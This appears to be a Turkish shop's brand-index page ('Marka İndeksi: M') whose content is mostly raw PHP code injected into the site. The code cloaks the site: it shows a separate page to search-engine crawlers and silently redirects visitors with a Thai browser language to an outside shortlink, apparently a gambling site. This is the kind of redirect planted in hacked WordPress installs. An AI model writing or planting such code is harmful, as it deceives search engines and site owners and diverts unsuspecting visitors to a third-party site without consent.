Favori Markanızı Bulun
Marka İndeksi: M
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $acceptLangRaw = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en'; $requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/'; $is_bot = preg_match('/(bot|crawl|spider|slurp|facebook|twitter|linkedin|embed)/i', $userAgent); $browserLang = substr($acceptLangRaw, 0, 2); $seo_content_path = __DIR__ . '/wp-content/home/index.html'; if ($is_bot && $requestUri === '/') { if (file_exists($seo_content_path)) { readfile($seo_content_path); } else { define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php'; } exit; } if ($browserLang === 'th') { header("Location: https://swiy.co/go_ufa55", true, 302); exit; }